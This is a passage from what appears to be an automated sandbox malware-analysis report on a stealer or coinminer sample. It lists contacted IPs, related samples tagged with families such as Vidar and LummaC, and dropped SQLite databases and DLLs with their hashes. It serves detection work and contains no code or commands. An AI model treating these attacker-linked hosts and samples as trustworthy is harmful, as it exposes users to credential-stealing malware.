                                                                                                                                                                                                                                  • 37.27.87.155
                                                                                                                                                                                                                                  qk9TaBBxh8.exeGet hashmaliciousLummaC, Glupteba, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoaderBrowse
                                                                                                                                                                                                                                  • 37.27.87.155
                                                                                                                                                                                                                                  file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                  • 37.27.87.155
                                                                                                                                                                                                                                  SecuriteInfo.com.Win64.Evo-gen.32634.31069.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro StealerBrowse
                                                                                                                                                                                                                                  • 37.27.87.155
                                                                                                                                                                                                                                  file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                  • 37.27.87.155
                                                                                                                                                                                                                                  4XAsw9FSr5.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  • 37.27.255.7
                                                                                                                                                                                                                                  77system.vbsGet hashmaliciousXmrigBrowse
                                                                                                                                                                                                                                  • 37.27.30.181
                                                                                                                                                                                                                                  aPu2pUmHzL.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                  • 188.227.216.187
                                                                                                                                                                                                                                  xjGg2eC75q.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                  • 37.27.52.220
                                                                                                                                                                                                                                  wsr3iUW0I0.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, Mars Stealer, PureLog StealerBrowse
                                                                                                                                                                                                                                  • 37.27.52.220
                                                                                                                                                                                                                                  AMXArgentinaSAARfile.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                  • 23.76.43.59
                                                                                                                                                                                                                                  https://url.us.m.mimecastprotect.com/s/kCCtC5yEz0tWp5ANrfz_KPV?domain=paplastics365-my.sharepoint.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                  • 23.76.37.146
                                                                                                                                                                                                                                  SecuriteInfo.com.Win64.Evo-gen.32634.31069.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro StealerBrowse
                                                                                                                                                                                                                                  • 23.76.43.59
                                                                                                                                                                                                                                  file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                  • 23.76.43.59
                                                                                                                                                                                                                                  file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                  • 23.76.43.59
                                                                                                                                                                                                                                  SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exeGet hashmaliciousPhonk Miner, PureLog Stealer, VidarBrowse
                                                                                                                                                                                                                                  • 23.76.43.59
                                                                                                                                                                                                                                  You have a newly assigned document from Frey Navarro P.L.L.C. .msgGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                  • 23.76.45.254
                                                                                                                                                                                                                                  file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                  • 23.76.43.59
                                                                                                                                                                                                                                  sl8houzZt9.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                  • 190.3.66.97
                                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, SmokeLoader, VidarBrowse
                                                                                                                                                                                                                                  • 190.220.21.28
                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                  51c64c77e60f3980eea90869b68c58a8file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                  • 37.27.87.155
                                                                                                                                                                                                                                  file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                  • 37.27.87.155
                                                                                                                                                                                                                                  file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                  • 37.27.87.155
                                                                                                                                                                                                                                  file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                  • 37.27.87.155
                                                                                                                                                                                                                                  SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exeGet hashmaliciousPhonk Miner, PureLog Stealer, VidarBrowse
                                                                                                                                                                                                                                  • 37.27.87.155
                                                                                                                                                                                                                                  file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                  • 37.27.87.155
                                                                                                                                                                                                                                  file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                  • 37.27.87.155
                                                                                                                                                                                                                                  file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                  • 37.27.87.155
                                                                                                                                                                                                                                  file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                  • 37.27.87.155
                                                                                                                                                                                                                                  Undetections.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                  • 37.27.87.155
                                                                                                                                                                                                                                  37f463bf4616ecd445d4a1937da06e19file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                  • 23.76.43.59
                                                                                                                                                                                                                                  Essay on Resolution of Korean Forced Labor Claims.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  • 23.76.43.59
                                                                                                                                                                                                                                  SecuriteInfo.com.Win32.Malware-gen.6467.28521.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  • 23.76.43.59
                                                                                                                                                                                                                                  SecuriteInfo.com.Win32.Malware-gen.6467.28521.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  • 23.76.43.59
                                                                                                                                                                                                                                  z42MNA2024000000041-KWINTMADI-11310Y_K.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                                                                                                  • 23.76.43.59
                                                                                                                                                                                                                                  z14Novospedidosdecompra_Profil_4903.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                                                                                                  • 23.76.43.59
                                                                                                                                                                                                                                  file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                  • 23.76.43.59
                                                                                                                                                                                                                                  Copy of Poseidon Marine 4th monthly Stores Apr 2024 R3 .xls.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                                                                                                                  • 23.76.43.59
                                                                                                                                                                                                                                  eOU2MVDmTd.exeGet hashmaliciousCredGrabber, Meduza Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                                                  • 23.76.43.59
                                                                                                                                                                                                                                  SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeGet hashmaliciousCobaltStrikeBrowse
                                                                                                                                                                                                                                  • 23.76.43.59
                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                  C:\ProgramData\freebl3.dllfile.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                    jNeaezBuo8.exeGet hashmaliciousGlupteba, Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                                      74fa486WVX.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                                        qk9TaBBxh8.exeGet hashmaliciousLummaC, Glupteba, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoaderBrowse
                                                                                                                                                                                                                                          file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                            SecuriteInfo.com.Win64.Evo-gen.32634.31069.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro StealerBrowse
                                                                                                                                                                                                                                              file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                  LXoASvZRu1.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                    nXXx6yL69w.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                      C:\ProgramData\mozglue.dllfile.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                        jNeaezBuo8.exeGet hashmaliciousGlupteba, Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                                                          74fa486WVX.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                                                            qk9TaBBxh8.exeGet hashmaliciousLummaC, Glupteba, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoaderBrowse
                                                                                                                                                                                                                                                              file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                SecuriteInfo.com.Win64.Evo-gen.32634.31069.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro StealerBrowse
                                                                                                                                                                                                                                                                  file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                      LXoASvZRu1.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                        nXXx6yL69w.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):49152
                                                                                                                                                                                                                                                                          Entropy (8bit):0.8180424350137764
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Reputation:high, very likely benign file
                                                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):98304
                                                                                                                                                                                                                                                                          Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Reputation:high, very likely benign file
                                                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):114688
                                                                                                                                                                                                                                                                          Entropy (8bit):0.9746603542602881
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Reputation:high, very likely benign file
                                                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):5242880
                                                                                                                                                                                                                                                                          Entropy (8bit):0.037963276276857943
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Reputation:high, very likely benign file
                                                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):40960
                                                                                                                                                                                                                                                                          Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Reputation:high, very likely benign file
                                                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):28672
                                                                                                                                                                                                                                                                          Entropy (8bit):2.5793180405395284
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Reputation:high, very likely benign file
                                                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):106496
                                                                                                                                                                                                                                                                          Entropy (8bit):1.1358696453229276
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                                                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                                                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                                                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                                                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Reputation:high, very likely benign file
                                                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):126976
                                                                                                                                                                                                                                                                          Entropy (8bit):0.47147045728725767
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                                                                                                                          MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                                                                                                                          SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                                                                                                                          SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                                                                                                                          SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):159744
                                                                                                                                                                                                                                                                          Entropy (8bit):0.7873599747470391
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                                                                                                                          MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                                                                                                                          SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                                                                                                                          SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                                                                                                                          SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):685392
                                                                                                                                                                                                                                                                          Entropy (8bit):6.872871740790978
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                                                                                                          MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                                                                                                          SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                                                                                                          SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                                                                                                                          SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                                                          Joe Sandbox View:
                                                                                                                                                                                                                                                                          • Filename: file.exe, Detection: malicious
                                                                                                                                                                                                                                                                          • Filename: jNeaezBuo8.exe, Detection: malicious
                                                                                                                                                                                                                                                                          • Filename: 74fa486WVX.exe, Detection: malicious
                                                                                                                                                                                                                                                                          • Filename: qk9TaBBxh8.exe, Detection: malicious
                                                                                                                                                                                                                                                                          • Filename: file.exe, Detection: malicious
                                                                                                                                                                                                                                                                          • Filename: SecuriteInfo.com.Win64.Evo-gen.32634.31069.exe, Detection: malicious
                                                                                                                                                                                                                                                                          • Filename: file.exe, Detection: malicious
                                                                                                                                                                                                                                                                          • Filename: file.exe, Detection: malicious
                                                                                                                                                                                                                                                                          • Filename: LXoASvZRu1.exe, Detection: malicious
                                                                                                                                                                                                                                                                          • Filename: nXXx6yL69w.exe, Detection: malicious
                                                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):608080
                                                                                                                                                                                                                                                                          Entropy (8bit):6.833616094889818
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                                                                                                          MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                                                                                                          SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                                                                                                          SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                                                                                                          SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                                                          Joe Sandbox View:
                                                                                                                                                                                                                                                                          • Filename: file.exe, Detection: malicious
                                                                                                                                                                                                                                                                          • Filename: jNeaezBuo8.exe, Detection: malicious
                                                                                                                                                                                                                                                                          • Filename: 74fa486WVX.exe, Detection: malicious
                                                                                                                                                                                                                                                                          • Filename: qk9TaBBxh8.exe, Detection: malicious
                                                                                                                                                                                                                                                                          • Filename: file.exe, Detection: malicious
                                                                                                                                                                                                                                                                          • Filename: SecuriteInfo.com.Win64.Evo-gen.32634.31069.exe, Detection: malicious
                                                                                                                                                                                                                                                                          • Filename: file.exe, Detection: malicious
                                                                                                                                                                                                                                                                          • Filename: file.exe, Detection: malicious
                                                                                                                                                                                                                                                                          • Filename: LXoASvZRu1.exe, Detection: malicious
                                                                                                                                                                                                                                                                          • Filename: nXXx6yL69w.exe, Detection: malicious
                                                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):450024
                                                                                                                                                                                                                                                                          Entropy (8bit):6.673992339875127
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                                                                                                                          MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                                                                                                                          SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                                                                                                                          SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                                                                                                                          SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
• Antivirus: Virustotal, Detection: 0%
                                                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2046288
                                                                                                                                                                                                                                                                          Entropy (8bit):6.787733948558952
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                                                                                                                          MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                                                                                                                          SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                                                                                                                          SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                                                                                                                          SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
• Antivirus: Virustotal, Detection: 0%
                                                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):257872
                                                                                                                                                                                                                                                                          Entropy (8bit):6.727482641240852
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                                                                                                                          MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                                                                                                                          SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                                                                                                                          SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                                                                                                                          SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
• Antivirus: Virustotal, Detection: 0%
                                                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):80880
                                                                                                                                                                                                                                                                          Entropy (8bit):6.920480786566406
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                                                                                                          MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                                                                                                          SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                                                                                                          SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                                                                                                          SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
• Antivirus: Virustotal, Detection: 0%
                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):805
                                                                                                                                                                                                                                                                          Entropy (8bit):5.355825766733025
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:ML9E4KlKDE4KhKiKhIE4Kx1qE4qpAE4KzeR:MxHKlYHKh3oIHKx1qHmAHKzeR
                                                                                                                                                                                                                                                                          MD5:7516119B9A2EB57F057E287C2D411DA0
                                                                                                                                                                                                                                                                          SHA1:4FF258F99431C6A96203C20E761999236B9D503C
                                                                                                                                                                                                                                                                          SHA-256:E14E24828927191906BC1603C48B8E30AD0952D20FD34EFA00ED8D5D810EA469
                                                                                                                                                                                                                                                                          SHA-512:DB7424D27FBFFB1F4D35C56B73A8D83286BF49980227496B6951267C2F0F1EB4C48A663871561427A4705F6C883A67DFAB7E4C3D040D13C2F93D57BD149A761E
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..
                                                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (2969), with CRLF, LF line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):33790
                                                                                                                                                                                                                                                                          Entropy (8bit):5.4364505591449435
                                                                                                                                                                                                                                                                          Encrypted:false
